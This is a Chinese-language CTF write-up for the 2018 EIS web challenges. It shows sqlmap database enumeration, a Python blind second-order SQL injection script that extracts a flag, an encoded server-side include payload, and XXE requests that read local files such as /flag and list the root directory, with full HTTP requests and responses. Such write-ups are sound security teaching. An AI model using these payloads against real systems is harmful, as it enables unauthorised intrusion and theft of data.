2018 EIS Web writeup

摘要： SimpleBBS http://bbs.sec.zju.edu.cn/ 題目解析: 1.登入處報錯 2.匯出burp的包使用sqlmap進行測試 sqlmap -r bbs.txt --dbs available databases [2]: [*]...

SimpleBBS

ofollow,noindex">http://bbs.sec.zju.edu.cn/

題目解析:

1.登入處報錯

2.匯出burp的包使用sqlmap進行測試

sqlmap -r bbs.txt --dbs

available databases [2]:
[*] bbs
[*] information_schema

sqlmap -r bbs.txt -D "bbs" --tables

Database: bbs
[7 tables]
+----------+
| admin|
| articles |
| comments |
| flag|
| messages |
| sections |
| users|
+----------+

sqlmap -r bbs.txt -D "bbs" --tables

Database: bbs
[7 tables]
+----------+
| admin|
| articles |
| comments |
| flag|
| messages |
| sections |
| users|
+----------+

sqlmap -r bbs.txt -D "bbs" -T "flag" -C "f" --dump

# 測試的時候已經沒有flag了....
Database: bbs
Table: flag
[1 entry]
+---------+
| f|
+---------+
| <blank> |
+---------+

SimpleBlog

題目描述:

SimpleBlog

http://210.32.4.20/

題目解析:

剛開始一直再找檔案包含想看下原始碼，後來是在找不到就認真做了下題目。發現直接二次注入就好了，如果注入內容存在後面做題的分數會為0。

import requests
import string
import urllib

flag=""

register = 'http://210.32.4.20/register.php'
login = 'http://210.32.4.20/login.php'
answer = 'http://210.32.4.20/answer.php'
logout = 'http://210.32.4.20/logout.php'

for i in range(3,50):
for j in range(32,126):
print "i:",chr(i),"j",chr(j)
req = requests.session()
payload = "\' or if((ascii(substr((select flag from flag),"+str(i)+",1))="+str(j)+"),1,0)='1' or \'"
post_answer = {'1.a':'on'}
login_data = {'username':urllib.quote(payload),'password':'zeroyu'}
r = req.post(register,data=login_data)
lin = req.post(login,data=login_data)
ans = req.post(answer,data=post_answer) 

if 'Your grades is 0' not in ans.content:
f=chr(j)
print f
flag=flag+f
print flag
break
lout = req.get(logout)

SimpleServerInjection

題目描述:

SimpleServerInjection, SSI, flag in current directory

http://210.32.4.22/index.php

題目解析:

瞭解到是ssi，提示了讀flag檔案，常規payload發現 # 號後內容被截斷，於是採用編碼繞過。

payload

<!--%23include+virtual%3D"flag"+-->

參考:

https://junookyo.blogspot.com/2012/03/shtml-bypass-view-symlink-server-side.html

https://www.secpulse.com/archives/66934.html

http://xdxd.love/2015/12/09/ssi%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D/

SimpleExtensionExplorerInjection

題目描述:

SimpleExtensionExplorerInjection, XXE, /flag

http://210.32.4.21:8080/www/index.html

題目解析:

1.burp抓包發現採用json格式傳輸資料

2.修改 Content-Type 欄位為 xml ，嘗試post xml格式資料

根據請求和響應發現存在xxe漏洞

請求

POST /www/ HTTP/1.1
Host: 210.32.4.21:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://210.32.4.21:8080/www/index.html
Content-Type: application/xml; charset=UTF-8
Content-Length: 73
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<name>zzz</name>
<age>zzz</age>

響應

HTTP/1.1 500 
Content-Type: application/json;charset=UTF-8
Date: Fri, 16 Nov 2018 09:17:40 GMT
Connection: close
Content-Length: 254

{"timestamp":"2018-11-16T09:17:40.797+0000","status":500,"error":"Internal Server Error","message":"org.xml.sax.SAXParseException; lineNumber: 3; columnNumber: 2; The markup in the document following the root element must be well-formed.","path":"/www/"}

3.依據提示 /flag ，直接去讀檔案

請求

POST /www/ HTTP/1.1
Host: 210.32.4.21:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://210.32.4.21:8080/www/index.html
Content-Type: application/xml; charset=UTF-8
Content-Length: 151
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///flag" >]>
<root>
<name>name</name>
<age>&xxe;</age>
</root>

響應:

HTTP/1.1 200 
Content-Type: text/plain;charset=UTF-8
Content-Length: 64
Date: Fri, 16 Nov 2018 09:21:23 GMT
Connection: close

Received name: name, age: EIS{bce52c116d589ae9472e59a162cc90e2}

參考:

https://blog.netspi.com/playing-content-type-xxe-json-endpoints/

https://thief.one/2017/06/20/1/

SimplePrintEventLogger

題目描述:

SimplePrintEventLogger, same server as SimpleExtensionExploreInjection , RCE, flag in /

http://210.32.4.21:8080/www/index.html

題目解析:

同一個題目的伺服器上，flag在根目錄，手動翻一下就好

請求

POST /www/ HTTP/1.1
Host: 210.32.4.21:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://210.32.4.21:8080/www/index.html
Content-Type: application/xml; charset=UTF-8
Content-Length: 147
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///" >]>
<root>
<name>name</name>
<age>&xxe;</age>
</root>

響應

HTTP/1.1 200 
Content-Type: text/plain;charset=UTF-8
Content-Length: 169
Date: Fri, 16 Nov 2018 16:46:04 GMT
Connection: close

Received name: name, age: .dockerenv
bin
boot
dev
docker-java-home
etc
flag
flagvvvvvaaaagegsgag2333
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var

讀取 flagvvvvvaaaagegsgag2333

請求

POST /www/ HTTP/1.1
Host: 210.32.4.21:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://210.32.4.21:8080/www/index.html
Content-Type: application/xml; charset=UTF-8
Content-Length: 171
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///flagvvvvvaaaagegsgag2333" >]>
<root>
<name>name</name>
<age>&xxe;</age>
</root>

響應

HTTP/1.1 200 
Content-Type: text/plain;charset=UTF-8
Content-Length: 64
Date: Fri, 16 Nov 2018 16:47:38 GMT
Connection: close

Received name: name, age: EIS{f501e9c5323c560b0a40192ce9b7ad38}